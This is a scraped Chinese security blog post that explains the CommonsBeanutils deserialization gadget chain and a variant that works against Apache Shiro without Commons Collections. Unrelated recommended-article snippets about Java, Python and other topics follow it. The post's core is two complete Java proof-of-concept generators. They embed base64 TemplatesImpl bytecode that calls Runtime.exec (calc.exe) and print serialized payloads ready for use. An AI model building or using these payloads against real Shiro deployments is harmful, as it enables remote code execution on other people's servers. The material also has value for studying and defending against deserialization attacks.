why811
why811

cbu和无cc的shiro反序列化

前置知识

学习CommonsBeanutils之前应该知道

  1. javaBean,可以看《Java简单特性》也可以看这里
  2. 有关BeanComparator的介绍
  3. TemplatesImpl gadget,前两个方法是public
TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()
-> TransletClassLoader#defineClass()

cbu链原理

cbu和无cc的shiro反序列化_第1张图片

BeanComparator()用于比较两个Java Bean,当property不存在的时候会调用PropertyUtils.getProperty去获取JavaBean的属性,也就是执行getter

恰巧TemplatesImpl#getOutputProperties符合getter的命名规则

Gadget

Gadget chain:
    ObjectInputStream.readObject()
        PriorityQueue.readObject()
            PriorityQueue.heapify()
                PriorityQueue.siftDown()
                    siftDownUsingComparator()
                        BeanComparator.compare()
                            TemplatesImpl.getOutputProperties()
                                TemplatesImpl.newTransformer()
                                    TemplatesImpl.getTransletInstance()
                                        TemplatesImpl.defineTransletClasses()
                                            TemplatesImpl.TransletClassLoader.defineClass()
                                                 Runtime.exec()

Poc

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import org.apache.commons.beanutils.BeanComparator;

public class CommonsBeanutils1 {
    public static void main(String[] args) throws Exception {
        String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
        System.out.println(base64encodedString);
    }

        public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static byte[] getpayload() throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        final BeanComparator comparator = new BeanComparator();
        final PriorityQueue queue = new PriorityQueue(2, comparator);
        // stub data for replacement later
        queue.add(1);
        queue.add(1);

        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        //本地触发测试
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();

        return barr.toByteArray();
    }
}

Shiro反序列化遇到的困难


    

  • 本地生成payload的包和远程依赖的包版本不一导致serialVersionID不一致,反序列化失败
    • 



cbu和无cc的shiro反序列化_第2张图片


    

  • Shiro自带CommonsBeanutils,不依赖cc。但是Shiro反序列化需要cc
    • 



虽然cbu本身依赖cc,但是Shiro中自带的cbu中的类不全,反序列化会失败




no CC的Gadge


org.apache.commons.collections.comparators.ComparableComparator在BeanComparator类的构造方法里面被用到,要解决没有cc的时候ClassNotFound的问题就需要替换这个ComparableComparator。


cbu和无cc的shiro反序列化_第3张图片


因为ComparableComparator实现了Comparator接口,替换候选类需要满足:


    

  • 实现了java.util.Comparatorjava.io.Serializable接口
    • 

  • Java,shiro,cbu里面自带
    • 



我们去看Comparator接口,看下哪些类实现了他:


cbu和无cc的shiro反序列化_第4张图片


java.lang.String.CaseInsensitiveComparator:


cbu和无cc的shiro反序列化_第5张图片


直接通过String.CASE_INSENSITIVE_ORDER就可以获得一个对象


poc


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class CommonsBeanutils1Shiro {
    public static void main(String[] args) throws Exception {
        String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
        System.out.println(base64encodedString);
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static byte[] getpayload() throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue queue = new PriorityQueue(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");

        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        // 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

//        //本地触发测试
//        System.out.println(barr);
//        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
//        Object o = (Object)ois.readObject();

        return barr.toByteArray();
    }
}
























你可能感兴趣的:(python,开发语言,java,tomcat,hibernate)






    

  • python基本操作和方法
魔曦帝天

    split,丛左往右分割url='www.bcd.com'li=url.split('.',1)以点为分隔符,分割为两个a,b=url.split(.)#生成一个列表,字符串rsplit从右往左url='www.qm.com'url2=url.rsplit('.',1)url2['www.qfedu','com']printstr.split('',1);#以空格为分隔符,分隔成两个rsplit从
    

    • 

  • javaSE基础知识点(部分)
乖,别闹596
java算法数据结构

    1、基本类型和引用类型的区别?基本数据类型在被创建时,在栈上给其划分一块内存,将数值直接存储在栈(Stack)上。​引用数据类型在被创建时,首先要在栈上给其引用分配一块内存,而对象的具体信息都存储在堆内存上,然后由栈(Stack)上面的引用指向堆(Heap)中对象的地址。【引用(栈)——>对象地址(堆)】​​2、快速排序快速排序是一种高效的排序算法,其基本思想是采用分治策略。​快速排序算法通过多次
    

    • 

  • 187_陈易奇_Java核心编程
陈易奇
java

    第一周笔记一、源代码中重要组成元素public表示访问说明符,表面该类是一个公共类,可以控制其他对象对类成员的访问。class用于声明一个类,其后跟的字符串是类的名称。static表示该方法是一个静态方法,允许调用main()方法,无需创建类的实例。void表示main()方法没有返回值。main()方法是所有程序的入口,最先开始执行。“/””/”之间的内容和以”//”开始的内容为java程序的解
    

    • 

  • 借助 Spring Boot 和 GraalVM 实现原生 Java
JavaMonsterr
程序员计算机Javajava后端

    Java在主导着企业级应用。但是在云中,采用Java的成本要比其竞争者更高。使用GraalVM进行原生编译降低了在云中Java的成本:它所创建的应用启动更快,使用的内存也更少。原生编译为Java用户带来了很多的问题:原生Java会如何改变开发方式?我们在什么情况下该转向原生Java?在什么情况下又该避免转向原生Java?要使用原生Java,我们该采用哪个框架?本系列的文章将回答这些问题。Java社
    

    • 

  • 【mysql】03通过命令行快速导出带字段名的csv格式数据
余欲与鱼语渔
mysql数据库

    导出数据命令如下:mysql-uyour_username-p-e"SELECT*FROMdatabase.table"--batch>filename.csv导出的数据以制表符’\t’分隔字段更换分隔符想换逗号可以在‘>’前面加上:|sed's/\t/,/g'不想要字段名不想要字段名,可以在batch后面再加个参数:--skip-column-names读取数据在python中读取数据注意设置编
    

    • 

  • 大数据技术之HBase API(3)
大数据深度洞察
Hbase大数据hbase数据库

    目录HBaseAPI环境准备创建连接单线程创建连接多线程创建连接DDLDMLHBaseAPI环境准备新建项目后,在pom.xml中添加如下依赖:org.apache.hbasehbase-server2.4.11org.glassfishjavax.elorg.glassfishjavax.el3.0.1-b06注意:javax.el包虽然会报错不存在,但这仅是一个测试用的依赖,不会影响实际使用。
    

    • 

  • 【网站项目】SpringBoot549农事管理系统
卓怡学长
计算机毕业设计javaspringspringboot

    作者简介:多年一线开发工作经验,原创团队,分享技术代码帮助学生学习,独立完成自己的网站项目。代码可以查看文章末尾⬇️联系方式获取,记得注明来意哦~赠送计算机毕业设计600个选题excel文件,帮助大学选题。赠送开题报告模板,帮助书写开题报告。作者完整代码目录供你选择:《Springboot网站项目》400套《ssm网站项目》800套《小程序项目》300套《App项目》500套《Python网站项目
    

    • 

  • 华为OD机试真题 - 亲子游戏 - 广度优先搜索BFS(Python/JS/C/C++ 2024 D卷 200分)
哪 吒
华为od游戏宽度优先

    华为OD机试2024E卷题库疯狂收录中,刷题点这里专栏导读本专栏收录于《华为OD机试真题(Python/JS/C/C++)》。刷的越多,抽中的概率越大,私信哪吒,备注华为OD,加入华为OD刷题交流群,每一题都有详细的答题思路、详细的代码注释、3个测试用例、为什么这道题采用XX算法、XX算法的适用场景,发现新题目,随时更新,全天CSDN在线答疑。一、题目描述宝宝和妈妈参加亲子游戏,在一个二维矩阵(N
    

    • 

  • 华为OD机试真题 - 表演赛游戏分组 - 动态规划(Python/JS/C/C++ 2024 D卷 200分)
哪 吒
华为od游戏动态规划

    华为OD机试2024E卷题库疯狂收录中,刷题点这里专栏导读本专栏收录于《华为OD机试真题(Python/JS/C/C++)》。刷的越多,抽中的概率越大,私信哪吒,备注华为OD,加入华为OD刷题交流群,每一题都有详细的答题思路、详细的代码注释、3个测试用例、为什么这道题采用XX算法、XX算法的适用场景,发现新题目,随时更新,全天CSDN在线答疑。一、题目描述部门准备举办一场王者荣耀表演赛,有10名游
    

    • 

  • 华为OD机试真题 - 字符串排序(Python/JS/C/C++ 2024 D卷 100分)
哪 吒
python华为odjavajavascriptcc++

    华为OD机试2024E卷题库疯狂收录中,刷题点这里专栏导读本专栏收录于《华为OD机试真题(Python/JS/C/C++)》。刷的越多,抽中的概率越大,私信哪吒,备注华为OD,加入华为OD刷题交流群,每一题都有详细的答题思路、详细的代码注释、3个测试用例、为什么这道题采用XX算法、XX算法的适用场景,发现新题目,随时更新,全天CSDN在线答疑。一、题目描述编写一个程序,将输入字符串中的字符按如下规
    

    • 

  • 反编译及JD-GUI 使用详解
吹老师个人app编程教学
java-必备技能pythonpycharm开发语言

    1、反编译介绍1.1、什么是反编译器大家都知道,将源代码转换成二进制执行代码的过程叫“编译”,比如将C源代码编译成exe可执行文件;那么把二进制执行代码转换成源代码的过程就叫“反编译”,比如把exe转换为C源代码就叫“反编译”。由于主流的C的编译器都进行了代码的优化,因此把C编译生成的exe文件反编译成C代码非常困难。但是像Java、.net这样基于虚拟机技术的编程语言则反编译非常容易,Java平
    

    • 

  • 华为OD机试真题 - 数组合并(Python/JS/C/C++ 2024 D卷 100分)
哪 吒
python华为odjavacc++javascript

    一、题目描述现在有多组整数数组,需要将他们合并成一个新的数组。合并规则从每个数组里按顺序取出固定长度的内容,合并到新的数组,取完的内容会删除掉。如果改行不足固定长度,或者已经为空,则直接取出剩余部分的内容放到新的数组中继续下一行。二、输入描述第一行,每次读取的固定长度,长度0

    • 

  • 如果你不改需求还能做朋友 不然我就死给你看
码思客

    流程控制java零基础入门-核心语法篇(六)流程控制顺序结构顺序结构就是从上到下,从左到有。如果不按照这个顺序来,就会发生错误,我们来看看顺序错误我们使用变量的顺序,一般是首先声明变量,再去使用变量,而如果你改变这个顺序的话,先使用,再声明,使用的时候就会报错。有些同学会问,为什么他不去楼下看看有没有,万一楼下有呢?没办法,他的智商暂时达不到。这样我们可以看到,在任何一个代码块里面,程序的执行都是
    

    • 

  • 基于Springboot的在线小说阅读平台。Javaee项目,springboot项目。
气宇轩昂固执狂
#Springboot项目springbootjava-ee后端

    演示视频:基于Springboot的在线小说阅读平台。Javaee项目,springboot项目。项目介绍:采用M(model)V(view)C(controller)三层体系结构,通过Spring+SpringBoot+Mybatis+Vue+Maven+Layui+Elementui来实现。MySQL数据库作为系统数据储存平台,实现了基于B/S结构的Web系统。界面简洁,操作简单。系统设计思想
    

    • 

  • Spring中常见的设计模式
苓风星河
设计模式javaspring

    Spring中常见的设计模式1、Java设计模式设计模式(DesignPattern)是解决特定问题的一系列套路。它不是语法规定,而是一套用来提高代码可复用性、可维护性、可读性、稳健性以及安全性的解决方案。早在1995年,GOF合作出版了《设计模式:可复用面向对象软件的基础》一书,共收录了23种设计模式,人称「GoF设计模式」。这23种设计模式的本质是面向对象设计原则的实际运用,是对类的封装性、继
    

    • 

  • java就业前景如何?如何成为一名Java工程师?
dirft_din

    java的就业前景还是非常可观的,在编程排行榜上java的地位一直不低,曾经在一段时间始终排在第一,今年随着很多编程语言的崛起,java的地位虽说有一定的徘徊,但是始终都在前三。薪资待遇首先我们去职友集网看下现在java开发工程师的薪资待遇:image这个是上海java开发工程师的薪资待遇,这个薪资和广州,深圳,北京java开发工程师的薪资待遇相差不大。只要自己系统的去掌握好java,多做项目,积
    

    • 

  • cornerstonejs介绍
花花进修
DICOM医学影像查看器html5javascriptnpmyarn

    Cornerstone.js是一个用于医疗成像应用程序的开源JavaScript库。它专门设计用于在Web浏览器中处理和显示DICOM(数字成像和通信在医学领域)图像。Cornerstone.js为开发者提供了强大的工具,可以轻松构建功能丰富的医学图像查看器,广泛应用于放射学、病理学、超声成像等领域。特点高性能图像渲染:支持大尺寸医学图像的快速渲染,包括CT扫描、MRI、X光片等。利用GPU加速(
    

    • 

  • JDK成长记16:从0分析你不知道的synchronized底层原理(下)
_程序员成长记

    file上一节你了解了什么是CAS、synchronized形成的锁的类型、重量级锁是用户态进程向内核态申请资源加锁过程,HotSpotJava对象结构,以及初步从3个层面分析了下synchronized的核心流程。还记得核心流程图么?如下所示:file这一节我们仔细来分析下这个过程中,每一步的底层原理。我们需要用到一个工具包,JOL,它可以将java对象的信息打印出来。你可以通过这个工具分析升级
    

    • 

  • JavaDay21 tcp三次握手、tcp和udp协议的区别、交互图片的练习
自称二次元人的程序员
Java基础的作业整理tcp/ipjava

    1.简述TCP的三次握手。TCP的三次握手:TCP协议中,在发送数据的准备阶段,客户端与服务器之间的三次交互,以保证连接的可靠。(1)第一次握手,客户端向服务器端发出连接请求,等待服务器确认;(2)第二次握手,服务器端向客户端回送一个响应,通知客户端收到了连接请求;(3)第三次握手,客户端再次向服务器端发送确认信息,确认连接。完成上述的三次握手后,客户端和服务器端的连接就已经建立了,每次连接的创建
    

    • 

  • Java整体基础知识体系图
神州永泰
java编程语言大数据javaspringmysql

    一java介绍‌Java是一种高级编程语言,由SunMicrosystems公司于1995年推出。‌Java具有跨平台性、面向对象、健壮性、安全性、可移植性等特点,被广泛应用于企业级应用开发、移动应用开发、大数据处理、云计算等领域。Java程序可以在不同的操作系统上运行,只需编译一次,就可以在任何支持Java虚拟机(JVM)的平台上运行,这得益于Java的“一次编写,随处运行”的特性。Java是面
    

    • 

  • 周报 | 24.8.26-24.9.1文章汇总
双木的木
python拓展学习深度学习拓展阅读目标检测人工智能python计算机视觉gpttransformerstablediffusion

    为了更好地整理文章和发表接下来的文章,以后每周都汇总一份周报。周报|24.8.19-24.8.25文章汇总-CSDN博客python|提升代码迭代速度的Python重载方法-CSDN博客机器学习算法与Python学习|黑匣子被打开了?能玩的Transformer可视化解释工具!_研究别人的黑盒算法机器学习python-CSDN博客极市平台|语言图像模型大一统!Meta将Transformer和Di
    

    • 

  • JAVA AES加密方式(AES-128-CBC)
帅哥与六便士
java安全开发语言

    记录下最近学到的加密方式。废话少说,直接上菜。首先,AES是对称性加密,加密解密使用的密钥是一样的。其次,AES-128-CBC模式加密,要求密钥key和偏移量IV的长度要一致,且长度都是16才可以加密。中间进行加密。最后,为了提高安全性,可以再进行一次base64编码。packageutils;importjavax.crypto.Cipher;importjavax.crypto.spec.I
    

    • 

  • python协程理论理解
python之行
pythonpython

    1、概念进程是指一段程序指令的运行活动,是计算机分配资源的最小单元(进程为线程提供资源,可以认为是指开了一块内存区域)线程是计算机中可以被cpu调度的最小单元,一个进程中可以有多个线程,进程为进程中的线程提供资源,线程是真正工作的单位协程也可以被称为微线程,是一种上下文切换技术,其实就是通过代码,切换执行不同的程序,目的是同线程一样,使计算机资源被充分利用2、作用进程:如果开启多进程,任务就可以由
    

    • 

  • Android Studio下Svn忽略文件配置的几种方法
nwsuafer
androidandroidstudio.gitignoresvn.svnignore

    (一)新建项目的时候AndroidStudio向导会创建两个.gitignore,对应的,我们创建两个.svnignore就可以了。里面配置信息可以参考.gitignore,具体配置信息可以参考github推荐的.gitignore写法#builtapplicationfiles*.apk*.ap_#filesforthedexVM*.dex#Javaclassfiles*.class#built
    

    • 

  • 常见Java集合
人才瘾大
java数据结构哈希算法

    1.fail-fast和fail-safe机制fail-fast(快速失败)和fail-safe(安全失败)是两种在遍历集合时处理并发修改的策略。1.1.fail-fast机制遍历集合时,如果发现集合被修改(除了通过迭代器自身的remove方法),会立即抛出ConcurrentModificationException异常。这种机制的目的是快速检测到不一致性并报告错误。如,使用ArrayList时
    

    • 

  • AES加密类库教程
马安柯Lorelei

    AES加密类库教程AES-Encryption-ClassesAESencryptioninPython,PHP,C#,Java,C++,F#,Ruby,Scala,Node.js项目地址:https://gitcode.com/gh_mirrors/ae/AES-Encryption-Classes项目介绍本教程将详细介绍GitHub上的一个开源项目——AES-Encryption-Classe
    

    • 

  • 在Android开发中,如何使用SharedPreferences(简称SP)一个轻量级的数据存储方式
西瓜本瓜@
androidjava原生开发工具类

    目录全局SharedPreferences工具类代码说明:如何使用这个工具类?在Android开发中,SharedPreferences(简称SP)是一个轻量级的数据存储方式,常用于保存应用的配置信息或少量的数据。为了便于在全局使用,可以将其封装到一个工具类中。以下是一个带有详细中文注释的全局SharedPreferences存储工具类的Java代码示例:全局SharedPreferences工具
    

    • 

  • Android 11 ,Android Studio 三方APP调用系统 system/lib 目录下so库使用过程中的BUG(坑)。
苏苏码不动了
androidandroidstudiobug

    背景介绍:最近在做文件管理器,需要把图库的功能集成到文件管理器中,实现在文件管理器中打开图片、切换图片的功能。在实现gif图片打开功能的时候,需要用到系统现成的gifplayerso库,导入Androidstudio的时候遇到了一堆问题,解决了感觉有必要记录一下主要的两个问题。一、Androidstudio导入so库。  按照下图创建目录导入。  java代码中使用System.loadLibra
    

    • 

  • javascript模板
wanggs

    模板DocumentClick{{title}}{{content}}$(function(){$("#btn").click(function(){varhtml=$("#template").html();html=html.replace("{{id}}",Math.random());html=html.replace("{{title}}","Hello,"+newDate().getT
    

    • 

  • javascript网页设计案例
Min_nna
jsjquery功能ai分析javascript

    以下是一些使用JavaScript进行网页设计的案例,这些案例展示了JavaScript在前端开发中的强大功能和灵活性。每个案例都包含了基本的实现思路和代码示例。图片画廊(ImageGallery)功能:展示一组图片,并支持点击放大查看。实现思路:使用HTML和CSS创建图片网格。使用JavaScript处理图片点击事件,显示放大的图片。代码示例:ImageGallery×consti
    

    • 

  • Enum用法
不懂事的小屁孩
enum

    以前的时候知道enum,但是真心不怎么用,在实际开发中,经常会用到以下代码:
protected final static String XJ = "XJ";
protected final static String YHK = "YHK";
protected final static String PQ = "PQ";

    

    • 

  • 【Spark九十七】RDD API之aggregateByKey
bit1129
spark

    1. aggregateByKey的运行机制
 
/**
* Aggregate the values of each key, using given combine functions and a neutral "zero value".
* This function can return a different result type
    

    • 

  • hive创建表是报错: Specified key was too long; max key length is 767 bytes
daizj
hive

    今天在hive客户端创建表时报错,具体操作如下
 
hive> create table test2(id string);
FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask. MetaException(message:javax.jdo.JDODataSto
    

    • 

  • Map 与 JavaBean之间的转换
周凡杨
java自省转换反射

    
最近项目里需要一个工具类,它的功能是传入一个Map后可以返回一个JavaBean对象。很喜欢写这样的Java服务,首先我想到的是要通过Java 的反射去实现匿名类的方法调用,这样才可以把Map里的值set 到JavaBean里。其实这里用Java的自省会更方便,下面两个方法就是一个通过反射,一个通过自省来实现本功能。
1:JavaBean类
1 &nb
    

    • 

  • java连接ftp下载
g21121
java

    有的时候需要用到java连接ftp服务器下载,上传一些操作,下面写了一个小例子。
/** ftp服务器地址 */
private String ftpHost;
/** ftp服务器用户名 */
private String ftpName;
/** ftp服务器密码 */
private String ftpPass;
/** ftp根目录 */
private String f
    

    • 

  • web报表工具FineReport使用中遇到的常见报错及解决办法(二)
老A不折腾
finereportweb报表java报表总结

     
抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。
 
出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。
 
1、没有返回数据集:
在存储过程中的操作语句之前加上set nocount on 或者在数据集exec调用存储过程的前面加上这句。当S
    

    • 

  • linux 系统cpu 内存等信息查看
墙头上一根草
cpu内存liunx

    1 查看CPU
  1.1 查看CPU个数
  # cat /proc/cpuinfo | grep "physical id" | uniq | wc -l
  2
  **uniq命令:删除重复行;wc –l命令:统计行数**
  1.2 查看CPU核数
  # cat /proc/cpuinfo | grep "cpu cores" | u
    

    • 

  • Spring中的AOP
aijuans
springAOP

     
Spring中的AOP
Written by Tony Jiang @ 2012-1-18 (转)何为AOP
AOP,面向切面编程。
在不改动代码的前提下,灵活的在现有代码的执行顺序前后,添加进新规机能。
来一个简单的Sample:
目标类:
[java] 
view plain
copy
print
?
package&nb
    

    • 

  • placeholder(HTML 5) IE 兼容插件
alxw4616
JavaScriptjquery jQuery插件

    placeholder 这个属性被越来越频繁的使用.
但为做HTML 5 特性IE没能实现这东西.
以下的jQuery插件就是用来在IE上实现该属性的.
/**
* [placeholder(HTML 5) IE 实现.IE9以下通过测试.]
* v 1.0 by oTwo 2014年7月31日 11:45:29
*/
$.fn.placeholder = function
    

    • 

  • Object类,值域,泛型等总结(适合有基础的人看)
百合不是茶
泛型的继承和通配符变量的值域Object类转换

    java的作用域在编程的时候经常会遇到,而我经常会搞不清楚这个
问题,所以在家的这几天回忆一下过去不知道的每个小知识点
 
变量的值域;
 
package 基础;
/**
* 作用域的范围
*
* @author Administrator
*
*/
public class zuoyongyu {
public static vo
    

    • 

  • JDK1.5 Condition接口
bijian1013
javathreadConditionjava多线程

    Condition 将 Object 监视器方法(wait、notify和 notifyAll)分解成截然不同的对象,以便通过将这些对象与任意 Lock 实现组合使用,为每个对象提供多个等待 set (wait-set)。其中,Lock 替代了 synchronized 方法和语句的使用,Condition 替代了 Object 监视器方法的使用。
条件(也称为条件队列或条件变量)为线程提供了一
    

    • 

  • 开源中国OSC源创会记录
bijian1013
hadoopsparkMemSQL

    一.Strata+Hadoop World(SHW)大会
        是全世界最大的大数据大会之一。SHW大会为各种技术提供了深度交流的机会,还会看到最领先的大数据技术、最广泛的应用场景、最有趣的用例教学以及最全面的大数据行业和趋势探讨。       
 
二.Hadoop
  &nbs
    

    • 

  • 【Java范型七】范型消除
bit1129
java

    范型是Java1.5引入的语言特性,它是编译时的一个语法现象,也就是说,对于一个类,不管是范型类还是非范型类,编译得到的字节码是一样的,差别仅在于通过范型这种语法来进行编译时的类型检查,在运行时是没有范型或者类型参数这个说法的。
范型跟反射刚好相反,反射是一种运行时行为,所以编译时不能访问的变量或者方法(比如private),在运行时通过反射是可以访问的,也就是说,可见性也是一种编译时的行为,在
    

    • 

  • 【Spark九十四】spark-sql工具的使用
bit1129
spark

    spark-sql是Spark bin目录下的一个可执行脚本,它的目的是通过这个脚本执行Hive的命令,即原来通过
hive>输入的指令可以通过spark-sql>输入的指令来完成。
spark-sql可以使用内置的Hive metadata-store,也可以使用已经独立安装的Hive的metadata store
 
关于Hive build into Spark
    

    • 

  • js做的各种倒计时
ronin47
js 倒计时

    
第一种:精确到秒的javascript倒计时代码  
  
HTML代码:  
<form name="form1">  
<div align="center" align="middle"
    

    • 

  • java-37.有n 个长为m+1 的字符串,如果某个字符串的最后m 个字符与某个字符串的前m 个字符匹配,则两个字符串可以联接
bylijinnan
java

